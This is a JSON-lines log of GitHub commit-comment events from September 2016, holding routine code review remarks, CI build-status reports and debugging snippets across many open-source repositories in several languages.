{"id":"4564749862","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19027211,"position":null,"line":null,"path":null,"commit_id":"7117abf5af13c25d679497cf21a7995035ec713c","created_at":"2016-09-14T21:34:17Z","updated_at":"2016-09-14T21:34:17Z","body":"os_2_0_develop_linux (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7117abf5af13c25d679497cf21a7995035ec713c-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7117abf5af13c25d679497cf21a7995035ec713c-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-14T21:34:17Z"}
{"id":"4564752294","type":"CommitCommentEvent","actor":{"login":"BlauFeuer"},"repo":{"name":"evennia/evennia"},"payload":{"comment":{"id":19027217,"position":13,"line":130,"path":"evennia/server/portal/webclient.py","commit_id":"4a97a05c10e04a417f16b0304b06666ea178ce20","created_at":"2016-09-14T21:34:47Z","updated_at":"2016-09-14T21:34:47Z","body":"This change doesn't make sense to me - looks like a typo."}},"created_at":"2016-09-14T21:34:47Z"}
{"id":"4564756820","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"StarRatio/star-ratio"},"payload":{"comment":{"id":19027231,"position":null,"line":null,"path":null,"commit_id":"45e2bedff33783e050f785822656bc1be56a8aee","created_at":"2016-09-14T21:35:39Z","updated_at":"2016-09-14T21:35:39Z","body":"Instead of referencing when the last commit was it may be more meaningful to have an avg of commits over the last month or other time span."}},"created_at":"2016-09-14T21:35:39Z"}
{"id":"4564759238","type":"CommitCommentEvent","actor":{"login":"thewonderidiot"},"repo":{"name":"rburkey2005/virtualagc"},"payload":{"comment":{"id":19027239,"position":null,"line":null,"path":null,"commit_id":"3adae84fc13e292f8dc9d171d1c18fec16540da1","created_at":"2016-09-14T21:36:10Z","updated_at":"2016-09-14T21:36:10Z","body":"Ah, that makes sense. Yeah, definitely not useless, and documenting all the uninitialized accesses is definitely a worthy goal. Especially since it seems like the pad load documents don't cover all of them.\r\n\r\nAlso, these are definitely still useful for the hardware sim :) Both the Icarus simulation and the FPGA project have files for the initial RAM state, and my current mini project is to expose all the AGC Monitor pins out over JTAG, so the descriptive pad loads could theoretically be sent over that way too."}},"created_at":"2016-09-14T21:36:10Z"}
{"id":"4564762416","type":"CommitCommentEvent","actor":{"login":"arjunguha"},"repo":{"name":"plasma-umass/Fission"},"payload":{"comment":{"id":19027257,"position":null,"line":null,"path":null,"commit_id":"33a4553d97e1e2271508d5305bd9f3bd2cde5302","created_at":"2016-09-14T21:36:46Z","updated_at":"2016-09-14T21:36:46Z","body":"What's the error message?\n\nSent from my phone\n\n> On Sep 14, 2016, at 16:55, rolivia <notifications@github.com> wrote:\n> \n> this doesn't compile and I don't know why; @arjunguha any ideas?\n> \n> -- \n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/plasma-umass/Fission/commit/33a4553d97e1e2271508d5305bd9f3bd2cde5302\n"}},"created_at":"2016-09-14T21:36:46Z"}
{"id":"4564763169","type":"CommitCommentEvent","actor":{"login":"marimysh"},"repo":{"name":"Komaric/BirthdayReminder"},"payload":{"comment":{"id":19027258,"position":103,"line":103,"path":"app/src/main/java/ru/komaric/birthdayreminder/sql/FileManager.java","commit_id":"767732e9d41de6021cf5362c90ac7efecc539411","created_at":"2016-09-14T21:36:56Z","updated_at":"2016-09-14T21:36:56Z","body":"4096 - можно вынести в константы"}},"created_at":"2016-09-14T21:36:56Z"}
{"id":"4564763611","type":"CommitCommentEvent","actor":{"login":"Kofotsmordarn"},"repo":{"name":"ineentho/textspel"},"payload":{"comment":{"id":19027259,"position":null,"line":null,"path":null,"commit_id":"27fcba1ef10571a3548f3b365ffd46f824c1589f","created_at":"2016-09-14T21:37:02Z","updated_at":"2016-09-14T21:37:02Z","body":"RRRRRRRRRRREEEEEEEEKT"}},"created_at":"2016-09-14T21:37:02Z"}
{"id":"4564764287","type":"CommitCommentEvent","actor":{"login":"raineorshine"},"repo":{"name":"tjunnone/npm-check-updates"},"payload":{"comment":{"id":19027263,"position":20,"line":57,"path":"package.json","commit_id":"ea2e4009749acfc12372f99210fc55ab43e96cc3","created_at":"2016-09-14T21:37:11Z","updated_at":"2016-09-14T21:37:11Z","body":"Thanks! I am heading out of town for the next two weeks, so I can't\ninvestigate right away. If you are able to determine if it is a breaking\nchange from Lodash and file a bug report if so that would be great. If it's\nsomehow on our side, I'll have to look into it when I get back.\nOn Wed, Sep 14, 2016 at 2:23 AM laggingreflex <notifications@github.com>\nwrote:\n\n> I'm not completely sure why but I think this latest lodash update is\n> breaking things.\n>\n> Here\n> <https://github.com/tjunnone/npm-check-updates/blob/master/lib/versionmanager.js#L343>\n> that _.partialRight(_.pick, _.identity) thing (which I believe to Remove\n> empty properties / falsy values from Object\n> <http://stackoverflow.com/questions/14058193/remove-empty-properties-falsy-values-from-object-with-underscore-js#comment41184386_23708667>?)\n> doesn't behave the same anymore with lodash update.\n>\n> I put a small code to debug what it was doing (or why it wasn't working)\n>\n> // .then(_.partialRight(_.pick, _.identity));\n> .then(_.partialRight(_.pick, x => {\n>     console.log('x:', x);\n>     const fn = _.partialRight(_.pick, _.identity);\n>     console.log('_.pick:', _.pick);\n>     const y = fn(x);\n>     console.log('y:', y);\n>     return y;\n> }));\n>\n> Here's the result (with the latest lodash)\n>\n> x: { 'babel-core': '6.14.0' }\n> _.pick: function () {\n>         var args = arguments,\n>             index = -1,\n>             length = nativeMax(args.length - start, 0),\n>             array = Array(length);\n>\n>         while (++index < length) {\n>           array[index] = args[start + index];\n>         }\n>         index = -1;\n>         var otherArgs = Array(start + 1);\n>         while (++index < start) {\n>           otherArgs[index] = args[index];\n>         }\n>         otherArgs[start] = array;\n>         return apply(func, this, otherArgs);\n>       }\n> y: {}\n>\n> The result y should be unchanged but it's empty.\n>\n> For comparison here's the same result from before the lodash update\n>\n> x: { 'babel-core': '6.14.0' }\n> _.pick: function () {\n>         var args = arguments,\n>             index = -1,\n>             length = nativeMax(args.length - start, 0),\n>             rest = Array(length);\n>\n>         while (++index < length) {\n>           rest[index] = args[start + index];\n>         }\n>         switch (start) {\n>           case 0: return func.call(this, rest);\n>           case 1: return func.call(this, args[0], rest);\n>           case 2: return func.call(this, args[0], args[1], rest);\n>         }\n>         var otherArgs = Array(start + 1);\n>         index = -1;\n>         while (++index < start) {\n>           otherArgs[index] = args[index];\n>         }\n>         otherArgs[start] = rest;\n>         return func.apply(this, otherArgs);\n>       }\n> y: { 'babel-core': '6.14.0' }\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/tjunnone/npm-check-updates/commit/ea2e4009749acfc12372f99210fc55ab43e96cc3#commitcomment-19014364>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAtyxBYgYYxGIhUS9iUluYQfq1v0etvvks5qp68LgaJpZM4J8hAC>\n> .\n>\n"}},"created_at":"2016-09-14T21:37:11Z"}
{"id":"4564764765","type":"CommitCommentEvent","actor":{"login":"niftynei"},"repo":{"name":"femnad/tuplre"},"payload":{"comment":{"id":19027264,"position":77,"line":77,"path":"src/tuplre_app.erl","commit_id":"1c45a2f7530210a4e224b11192503ac85a11e559","created_at":"2016-09-14T21:37:16Z","updated_at":"2016-09-14T21:37:16Z","body":"can remove these since they're also called in `perform_request`"}},"created_at":"2016-09-14T21:37:16Z"}
{"id":"4564768920","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19027273,"position":null,"line":null,"path":null,"commit_id":"0e6d0249556fae9afef428dc1c0822388c29d780","created_at":"2016-09-14T21:38:06Z","updated_at":"2016-09-14T21:38:06Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0e6d0249556fae9afef428dc1c0822388c29d780-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-14T21:38:06Z"}
{"id":"4564769342","type":"CommitCommentEvent","actor":{"login":"diogoko"},"repo":{"name":"duduvp/fatec-face-v4"},"payload":{"comment":{"id":19027274,"position":96,"line":105,"path":"modelo/usuarios.php","commit_id":"6091d22ae4449720c1744ab539dd415bae789623","created_at":"2016-09-14T21:38:11Z","updated_at":"2016-09-14T21:38:11Z","body":"Este tipo de construção pode ser resumida a `return count($result) >= 1;`, já que as comparações retornam valores booleanos diretamente."}},"created_at":"2016-09-14T21:38:11Z"}
{"id":"4564772434","type":"CommitCommentEvent","actor":{"login":"paramat"},"repo":{"name":"minetest/minetest_game"},"payload":{"comment":{"id":19027283,"position":31,"line":140,"path":"mods/stairs/init.lua","commit_id":"b848e35ca59c9eea3dbe3df87cb14d6bfea93f9a","created_at":"2016-09-14T21:38:46Z","updated_at":"2016-09-14T21:38:46Z","body":"'if under' was to cope with unknown nodes."}},"created_at":"2016-09-14T21:38:46Z"}
{"id":"4564775072","type":"CommitCommentEvent","actor":{"login":"niftynei"},"repo":{"name":"femnad/tuplre"},"payload":{"comment":{"id":19027285,"position":118,"line":118,"path":"src/tuplre_app.erl","commit_id":"1c45a2f7530210a4e224b11192503ac85a11e559","created_at":"2016-09-14T21:39:21Z","updated_at":"2016-09-14T21:39:21Z","body":"`get_endpoint(queue)` seems more elegant (and less code) ?"}},"created_at":"2016-09-14T21:39:21Z"}
{"id":"4564776193","type":"CommitCommentEvent","actor":{"login":"niftynei"},"repo":{"name":"femnad/tuplre"},"payload":{"comment":{"id":19027287,"position":121,"line":121,"path":"src/tuplre_app.erl","commit_id":"1c45a2f7530210a4e224b11192503ac85a11e559","created_at":"2016-09-14T21:39:35Z","updated_at":"2016-09-14T21:39:35Z","body":"it might be nice to make this a constant."}},"created_at":"2016-09-14T21:39:35Z"}
{"id":"4564780602","type":"CommitCommentEvent","actor":{"login":"WestLangley"},"repo":{"name":"mrdoob/three.js"},"payload":{"comment":{"id":19027301,"position":22,"line":397,"path":"src/math/Box3.js","commit_id":"5578c057a95b84972f80fecf134485e9666f0ea3","created_at":"2016-09-14T21:40:26Z","updated_at":"2016-09-14T21:40:26Z","body":"I'm thinking this shoud be:\r\n```javascript\r\nthis.getCenter( result.center );\r\n```"}},"created_at":"2016-09-14T21:40:26Z"}
{"id":"4564783478","type":"CommitCommentEvent","actor":{"login":"marimysh"},"repo":{"name":"Komaric/BirthdayReminder"},"payload":{"comment":{"id":19027305,"position":95,"line":95,"path":"app/src/main/java/ru/komaric/birthdayreminder/sql/ListBuilder.java","commit_id":"767732e9d41de6021cf5362c90ac7efecc539411","created_at":"2016-09-14T21:41:01Z","updated_at":"2016-09-14T21:41:01Z","body":"а вот это уже не так очевидно. Предположу что из какого-то формата в какой-то переводится? типа из dd.mm.yyyy в yyyy.mm.dd"}},"created_at":"2016-09-14T21:41:01Z"}
{"id":"4564783506","type":"CommitCommentEvent","actor":{"login":"diogoko"},"repo":{"name":"duduvp/fatec-face-v4"},"payload":{"comment":{"id":19027306,"position":123,"line":132,"path":"modelo/usuarios.php","commit_id":"6091d22ae4449720c1744ab539dd415bae789623","created_at":"2016-09-14T21:41:01Z","updated_at":"2016-09-14T21:41:01Z","body":"Fiquei um pouco confuso: o SELECT traz ID e nome do usuário, mas a função retorna apenas a quantidade. Nesse caso, faria mais sentido trazer a contagem diretamente com `SELECT COUNT(*) FROM curtida WHERE codigo_mural = ?`. Assim você economiza alguns recursos do banco e da própria linguagem."}},"created_at":"2016-09-14T21:41:01Z"}
{"id":"4564783694","type":"CommitCommentEvent","actor":{"login":"else"},"repo":{"name":"idbartosz/language-sass"},"payload":{"comment":{"id":19027307,"position":null,"line":null,"path":null,"commit_id":"06ce1442ef91baee20bf29d65132259e1f25ff52","created_at":"2016-09-14T21:41:04Z","updated_at":"2016-09-14T21:41:04Z","body":"thx"}},"created_at":"2016-09-14T21:41:04Z"}
{"id":"4564790713","type":"CommitCommentEvent","actor":{"login":"mrdoob"},"repo":{"name":"mrdoob/three.js"},"payload":{"comment":{"id":19027327,"position":22,"line":397,"path":"src/math/Box3.js","commit_id":"5578c057a95b84972f80fecf134485e9666f0ea3","created_at":"2016-09-14T21:42:30Z","updated_at":"2016-09-14T21:42:30Z","body":"Good catch!"}},"created_at":"2016-09-14T21:42:30Z"}
{"id":"4564792085","type":"CommitCommentEvent","actor":{"login":"rabbah"},"repo":{"name":"openwhisk/openwhisk"},"payload":{"comment":{"id":19027331,"position":4,"line":115,"path":"tests/src/system/basic/WskBasicTests.scala","commit_id":"4d9b7c6f40e736bb0c85d712654dc82e90e602fb","created_at":"2016-09-14T21:42:48Z","updated_at":"2016-09-14T21:42:48Z","body":"is WskBasicUsageTests a better place for these tests?"}},"created_at":"2016-09-14T21:42:48Z"}
{"id":"4564795393","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19027339,"position":null,"line":null,"path":null,"commit_id":"a02d5177bb09da008aaf8c625eddd63295ca4a2d","created_at":"2016-09-14T21:43:29Z","updated_at":"2016-09-14T21:43:29Z","body":"yes, will be included"}},"created_at":"2016-09-14T21:43:29Z"}
{"id":"4564798539","type":"CommitCommentEvent","actor":{"login":"diogoko"},"repo":{"name":"duduvp/fatec-face-v4"},"payload":{"comment":{"id":19027349,"position":86,"line":46,"path":"paginas/perfil.php","commit_id":"6091d22ae4449720c1744ab539dd415bae789623","created_at":"2016-09-14T21:44:07Z","updated_at":"2016-09-14T21:44:07Z","body":"E se não houver usuário logado, esta referência a $_SESSION dará algum erro ou warning? É possível confirmar com `isset()` ou `empty()`."}},"created_at":"2016-09-14T21:44:07Z"}
{"id":"4564799526","type":"CommitCommentEvent","actor":{"login":"slang800"},"repo":{"name":"iHavee/dockerfiles"},"payload":{"comment":{"id":19027353,"position":4,"line":37,"path":"transmission/Dockerfile","commit_id":"dc6b8231e13ee5d8420b45b775455789b50542a5","created_at":"2016-09-14T21:44:17Z","updated_at":"2016-09-14T21:44:17Z","body":"No prob! Thanks for updating it :D"}},"created_at":"2016-09-14T21:44:17Z"}
{"id":"4564799936","type":"CommitCommentEvent","actor":{"login":"robbiewxyz"},"repo":{"name":"developit/preact-compat"},"payload":{"comment":{"id":19027354,"position":6,"line":388,"path":"src/index.js","commit_id":"cc32ff3af40833f425556e5dc4ebda4c7a559bdf","created_at":"2016-09-14T21:44:22Z","updated_at":"2016-09-14T21:44:22Z","body":"We run `propsHook` directly on line 386, when the component is initialized; I think that does the job for the initial render."}},"created_at":"2016-09-14T21:44:22Z"}
{"id":"4564802215","type":"CommitCommentEvent","actor":{"login":"niftynei"},"repo":{"name":"femnad/tuplre"},"payload":{"comment":{"id":19027360,"position":137,"line":137,"path":"src/tuplre_app.erl","commit_id":"1c45a2f7530210a4e224b11192503ac85a11e559","created_at":"2016-09-14T21:44:50Z","updated_at":"2016-09-14T21:44:50Z","body":"what are you doing here? maybe leave a comment why this is necessary."}},"created_at":"2016-09-14T21:44:50Z"}
{"id":"4564802656","type":"CommitCommentEvent","actor":{"login":"Griatch"},"repo":{"name":"evennia/evennia"},"payload":{"comment":{"id":19027363,"position":13,"line":130,"path":"evennia/server/portal/webclient.py","commit_id":"4a97a05c10e04a417f16b0304b06666ea178ce20","created_at":"2016-09-14T21:44:56Z","updated_at":"2016-09-14T21:44:56Z","body":"Yep, fixed, thanks!"}},"created_at":"2016-09-14T21:44:56Z"}
{"id":"4564806134","type":"CommitCommentEvent","actor":{"login":"esuarezz"},"repo":{"name":"moizKachwala/Angular2-express-mongoose-gulp-node-typescript"},"payload":{"comment":{"id":19027370,"position":null,"line":null,"path":null,"commit_id":"0631119636a754412ee08a2fc88fa7f684daa427","created_at":"2016-09-14T21:45:38Z","updated_at":"2016-09-14T21:45:38Z","body":"Is it working fine now this \"default\" task??\r\nbecause i saw that guy complaining about another task, but i think here would be same problem, I have this for default:\r\n\r\n( I didnt add 'css' task)\r\n\r\n\r\ngulp.task('default', function() {\r\n    runSequence( 'clean', 'build:server', 'build:client', 'clientResources', 'libs', 'start-watch');\r\n\r\n});\r\ngulp.task('start-watch', function () {\r\n    nodemon({\r\n        script: 'dist/server/server.js'\r\n        , ext: 'html js ts'\r\n        , ignore: ['ignored.js']\r\n        , tasks: ['tslint'] })\r\n        .on('start', ['watch']);\r\n\r\n});"}},"created_at":"2016-09-14T21:45:38Z"}
{"id":"4564810154","type":"CommitCommentEvent","actor":{"login":"jay"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":19027383,"position":null,"line":null,"path":null,"commit_id":"d93215621f029b5048117496afdbba1b49e953a1","created_at":"2016-09-14T21:46:24Z","updated_at":"2016-09-14T21:46:24Z","body":"@bagder CI clang linux [failed](https://travis-ci.org/curl/curl/jobs/159861203#L3401) for this commit but I don't think the failure is related. This could be one of those arbitrary fluke failures that the CI could take the blame but it seems unusual. test 1208 _FTP PORT download, no data conn and no transient negative reply_\r\n~~~\r\n=== Start of file ftp_server.log\r\n12:46:27.525345 ====> Client connect\r\n12:46:27.525470 FTPD: Getting commands from log/ftpserver.cmd\r\n12:46:27.525509 FTPD: instructed to use NODATACONN150\r\n12:46:27.525575 > \"220- _ _ ____ _ [CR][LF]220- ___| | | | _ \\| | [CR][LF]220- / __| | | | |_) | | [CR][LF]220- | (__| |_| | _ {| |___ [CR][LF]220 \\___|\\___/|_| \\_\\_____|[CR][LF]\"\r\n12:46:30.849269 < \"USER anonymous\"\r\n12:46:30.849356 > \"331 We are happy you popped in![CR][LF]\"\r\n12:46:30.849394 MAIN sockfilt said DISC\r\n12:46:30.849416 ====> Client disconnected\r\n12:46:30.849487 Awaiting input\r\n12:46:30.849516 MAIN sockfilt said: DISC\r\n12:46:30.849537 Awaiting input\r\n=== End of file ftp_server.log\r\n~~~\r\n\r\nbut sockctrl says `12:46:27.572034 'USER anonymous\\r\\n'` \r\n\r\nnote there's no [CR][LF] on the server's USER anonymous"}},"created_at":"2016-09-14T21:46:24Z"}
{"id":"4564810409","type":"CommitCommentEvent","actor":{"login":"davisagli"},"repo":{"name":"oddbird/oddsite"},"payload":{"comment":{"id":19027385,"position":6,"line":10,"path":"templates/rst_display.html","commit_id":"bfd25c66edc34e6bb87c98972837b7f57ddc63c1","created_at":"2016-09-14T21:46:28Z","updated_at":"2016-09-14T21:46:28Z","body":"What's this for?"}},"created_at":"2016-09-14T21:46:28Z"}
{"id":"4564812078","type":"CommitCommentEvent","actor":{"login":"benoittgt"},"repo":{"name":"benoittgt/PhubMe"},"payload":{"comment":{"id":19027392,"position":null,"line":null,"path":null,"commit_id":"e837a2a437814cb2392d4909796936a7e2f2dd45","created_at":"2016-09-14T21:46:48Z","updated_at":"2016-09-14T21:46:48Z","body":"@nicoolas25 This is what you thought?"}},"created_at":"2016-09-14T21:46:48Z"}
{"id":"4564812176","type":"CommitCommentEvent","actor":{"login":"karlnicholas"},"repo":{"name":"CS111C-META-FALL-2016/LabC-Team1"},"payload":{"comment":{"id":19027393,"position":null,"line":null,"path":null,"commit_id":"5d7875c12ca578e02ba678fd6ac94024f27e9ecf","created_at":"2016-09-14T21:46:49Z","updated_at":"2016-09-14T21:46:49Z","body":"Hi, \r\n\r\nIt didn't compile and didn't meet the specs. \r\n\r\n     * @return Returns the index of the element within the list. Returns a\r\n     *         negative number if it doesn't.\r\n     */\r\n    @Override\r\n    public int contains(T anEntry) {  \r\n\r\nYou had it to return a boolean when it should return the index. Since there was an @Override annotation then it gave me a compile error. Actually, the comments also say:\r\n\r\n  * Checks to see if the list contains the element passed in. **Returns first instance of element if it exists**.\r\n\r\nWhich is not what it's doing so we should look closer at that.\r\n\r\n\r\n"}},"created_at":"2016-09-14T21:46:49Z"}
{"id":"4564812189","type":"CommitCommentEvent","actor":{"login":"ajmacdonald"},"repo":{"name":"cwrc/CWRC-Schema"},"payload":{"comment":{"id":19027394,"position":null,"line":null,"path":null,"commit_id":"75aedfa167b3887926c8150caeea3b9002085224","created_at":"2016-09-14T21:46:49Z","updated_at":"2016-09-14T21:46:49Z","body":"Try changing to ```BIBCIT::before```\r\nThe content property will replace the contents otherwise."}},"created_at":"2016-09-14T21:46:49Z"}
{"id":"4564814264","type":"CommitCommentEvent","actor":{"login":"niftynei"},"repo":{"name":"femnad/tuplre"},"payload":{"comment":{"id":19027399,"position":167,"line":167,"path":"src/tuplre_app.erl","commit_id":"1c45a2f7530210a4e224b11192503ac85a11e559","created_at":"2016-09-14T21:47:14Z","updated_at":"2016-09-14T21:47:14Z","body":"maybe change name to something more descriptive. like \"print messages\"?"}},"created_at":"2016-09-14T21:47:14Z"}
{"id":"4564818655","type":"CommitCommentEvent","actor":{"login":"marimysh"},"repo":{"name":"Komaric/BirthdayReminder"},"payload":{"comment":{"id":19027408,"position":20,"line":20,"path":"app/src/main/java/ru/komaric/birthdayreminder/sql/Person.java","commit_id":"767732e9d41de6021cf5362c90ac7efecc539411","created_at":"2016-09-14T21:48:07Z","updated_at":"2016-09-14T21:48:07Z","body":"Не вижу чтобы где-то таки задавался этот параметр."}},"created_at":"2016-09-14T21:48:07Z"}
{"id":"4564820286","type":"CommitCommentEvent","actor":{"login":"SamanthaNguyen"},"repo":{"name":"Brickimedia/LocalSettings"},"payload":{"comment":{"id":19027413,"position":null,"line":null,"path":null,"commit_id":"f71c8f1be0322b0c8ab4dcbf7ffdefa7c4e6572f","created_at":"2016-09-14T21:48:24Z","updated_at":"2016-09-14T21:48:24Z","body":"Ah I see, my mistake then! Thanks for pointing that out (otherwise if it was pulled to the server accidentally we would temporarily not have a Brickimedia anymore :P) \r\n\r\n"}},"created_at":"2016-09-14T21:48:24Z"}
{"id":"4564820979","type":"CommitCommentEvent","actor":{"login":"jgerigmeyer"},"repo":{"name":"oddbird/oddsite"},"payload":{"comment":{"id":19027416,"position":6,"line":10,"path":"templates/rst_display.html","commit_id":"bfd25c66edc34e6bb87c98972837b7f57ddc63c1","created_at":"2016-09-14T21:48:33Z","updated_at":"2016-09-14T21:48:33Z","body":"This `block` is overriding the default `block robots` in `base.html`. Jinja2 doesn't allow blocks inside conditionals, so `super()` just returns whatever was contained in the original block.\r\n\r\ncf http://stackoverflow.com/questions/22655031/jinja2-how-to-put-a-block-in-an-if-statement"}},"created_at":"2016-09-14T21:48:33Z"}
{"id":"4564829676","type":"CommitCommentEvent","actor":{"login":"marimysh"},"repo":{"name":"Komaric/BirthdayReminder"},"payload":{"comment":{"id":19027436,"position":33,"line":33,"path":"app/src/main/java/ru/komaric/birthdayreminder/sql/Person.java","commit_id":"767732e9d41de6021cf5362c90ac7efecc539411","created_at":"2016-09-14T21:50:18Z","updated_at":"2016-09-14T21:50:18Z","body":"Если в этом классе таки должен быть еще и color, то можно заменить на @AllArgsConstructor"}},"created_at":"2016-09-14T21:50:18Z"}
{"id":"4564832131","type":"CommitCommentEvent","actor":{"login":"dblock"},"repo":{"name":"mongoid/mongoid-history"},"payload":{"comment":{"id":19027446,"position":null,"line":null,"path":null,"commit_id":"75c200fba411530047c1c23a750aff05f93ac836","created_at":"2016-09-14T21:50:49Z","updated_at":"2016-09-14T21:50:49Z","body":"All done. I force undid this commit and now mongoid/mongoid-history is the parent. Everybody who had admin access now has admin access to it in addition to @estolfo and @durran, including rubygems. "}},"created_at":"2016-09-14T21:50:49Z"}
{"id":"4564835113","type":"CommitCommentEvent","actor":{"login":"BRCOL"},"repo":{"name":"BRCOL/Code_Bienes"},"payload":{"comment":{"id":19027451,"position":null,"line":null,"path":null,"commit_id":"870d746a065ca29f670ed9f43b2fe4d3df99a6bb","created_at":"2016-09-14T21:51:25Z","updated_at":"2016-09-14T21:51:25Z","body":"Prueba"}},"created_at":"2016-09-14T21:51:25Z"}
{"id":"4564835782","type":"CommitCommentEvent","actor":{"login":"ayufan"},"repo":{"name":"mikey0000/device-softwinner"},"payload":{"comment":{"id":19027454,"position":19,"line":132,"path":"tulip-chiphd/tulip_chiphd_atv.mk","commit_id":"af984dfbbd33a01d75b6e0157111def5b2f37ca3","created_at":"2016-09-14T21:51:33Z","updated_at":"2016-09-14T21:51:33Z","body":"Ah. OK."}},"created_at":"2016-09-14T21:51:33Z"}
{"id":"4564837044","type":"CommitCommentEvent","actor":{"login":"justinmk"},"repo":{"name":"jamessan/neovim"},"payload":{"comment":{"id":19027458,"position":34,"line":36,"path":"test/functional/ui/output_spec.lua","commit_id":"f332eba16c290c729b21171ed83b1e3377ee17ec","created_at":"2016-09-14T21:51:49Z","updated_at":"2016-09-14T21:51:49Z","body":"Hmm, this change removed the purpose of the test."}},"created_at":"2016-09-14T21:51:49Z"}
{"id":"4564837919","type":"CommitCommentEvent","actor":{"login":"rolivia"},"repo":{"name":"plasma-umass/Fission"},"payload":{"comment":{"id":19027462,"position":null,"line":null,"path":null,"commit_id":"33a4553d97e1e2271508d5305bd9f3bd2cde5302","created_at":"2016-09-14T21:52:00Z","updated_at":"2016-09-14T21:52:00Z","body":"sorry nevermind.  i fixed it."}},"created_at":"2016-09-14T21:52:00Z"}
{"id":"4564837974","type":"CommitCommentEvent","actor":{"login":"sampathweb"},"repo":{"name":"andreaeverett/dsp"},"payload":{"comment":{"id":19027465,"position":27,"line":25,"path":"python/advanced_python_dict.py","commit_id":"31b1502647abac2fedf3ec297977d968c9aec546","created_at":"2016-09-14T21:52:01Z","updated_at":"2016-09-14T21:52:01Z","body":"@andreaeverett Good use of `try: except` block 👍 "}},"created_at":"2016-09-14T21:52:01Z"}
{"id":"4564838542","type":"CommitCommentEvent","actor":{"login":"LcnFredyee"},"repo":{"name":"augustoaraujo97/PI02"},"payload":{"comment":{"id":19027467,"position":null,"line":null,"path":null,"commit_id":"a6d4ffc3946d16e70a4f0b05d32ae0fcb2752b68","created_at":"2016-09-14T21:52:09Z","updated_at":"2016-09-14T21:52:09Z","body":"Não consigo ver. Vcs veem isso que escrevi? )"}},"created_at":"2016-09-14T21:52:09Z"}
{"id":"4564847334","type":"CommitCommentEvent","actor":{"login":"sampathweb"},"repo":{"name":"andreaeverett/dsp"},"payload":{"comment":{"id":19027492,"position":17,"line":15,"path":"python/advanced_python_dict.py","commit_id":"31b1502647abac2fedf3ec297977d968c9aec546","created_at":"2016-09-14T21:53:52Z","updated_at":"2016-09-14T21:53:52Z","body":"Regex is very powerful.  Nice use of `^` and `$`.  Regex proficiency will serve you well when we get to NLP around week 7."}},"created_at":"2016-09-14T21:53:52Z"}
{"id":"4564847362","type":"CommitCommentEvent","actor":{"login":"niftynei"},"repo":{"name":"femnad/tuplre"},"payload":{"comment":{"id":19027493,"position":182,"line":182,"path":"src/tuplre_app.erl","commit_id":"1c45a2f7530210a4e224b11192503ac85a11e559","created_at":"2016-09-14T21:53:52Z","updated_at":"2016-09-14T21:53:52Z","body":"```\r\nmessage_loop\r\n    receive\r\n    after 1000 ->\r\n        check_for_messages...\r\n        ...\r\n        message_loop()\r\n    end.\r\n```"}},"created_at":"2016-09-14T21:53:52Z"}
{"id":"4564853378","type":"CommitCommentEvent","actor":{"login":"dlespiau"},"repo":{"name":"jcvenegas/hyperstart"},"payload":{"comment":{"id":19027510,"position":null,"line":null,"path":null,"commit_id":"1cc770522f54a8b09858fdb6d02e0b3ef91e223d","created_at":"2016-09-14T21:55:03Z","updated_at":"2016-09-14T21:55:03Z","body":"Alternatively, we could add a special --with-binary-name config option. That'd allow us to properly generate the systemd file from it as well (still looking for an upstreamable way to do it)."}},"created_at":"2016-09-14T21:55:03Z"}
{"id":"4564854025","type":"CommitCommentEvent","actor":{"login":"kkrysiak"},"repo":{"name":"fgomez02/useful_code"},"payload":{"comment":{"id":19027514,"position":170,"line":170,"path":"Survival_Chi_square_5.R","commit_id":"3a36a2fcb7d024e42bddb4876c04bc8541d4afa9","created_at":"2016-09-14T21:55:12Z","updated_at":"2016-09-14T21:55:12Z","body":"Another way to handle this section would be the following (in 1 line):\r\n`manual_review$call <- toupper(manual_review$call)`\r\n\r\nBut I understand that you want to check the new column so I'd go with this (just change the name rather than null out the column):\r\n`manual_review$call_upper <- toupper(manual_review$call)\r\nmanual_review$call <-NULL\r\ncolnames(manual_review)[which(colnames(manual_review) == \"call_upper\"] <- \"call\"`"}},"created_at":"2016-09-14T21:55:12Z"}
{"id":"4564857531","type":"CommitCommentEvent","actor":{"login":"gyrog"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19027521,"position":null,"line":null,"path":null,"commit_id":"a60d175334693805ed90d094d4a39efe100e2c32","created_at":"2016-09-14T21:55:51Z","updated_at":"2016-09-14T21:55:51Z","body":"My not be a good idea to rely on rc.update to copy, if that should change then we are creating a trap for ourselves. Safer to delete all that need to be deleted, here."}},"created_at":"2016-09-14T21:55:51Z"}
{"id":"4564858153","type":"CommitCommentEvent","actor":{"login":"rcavicchi"},"repo":{"name":"usnistgov/FlowImageAnalysis"},"payload":{"comment":{"id":19027524,"position":null,"line":null,"path":null,"commit_id":"d66bc6dd2bd4a89d93468258fd1083558b4f7feb","created_at":"2016-09-14T21:55:59Z","updated_at":"2016-09-14T21:55:59Z","body":"fixed no label option\r\noutput results now references background subtracted image for brightness (Max Min) values"}},"created_at":"2016-09-14T21:55:59Z"}
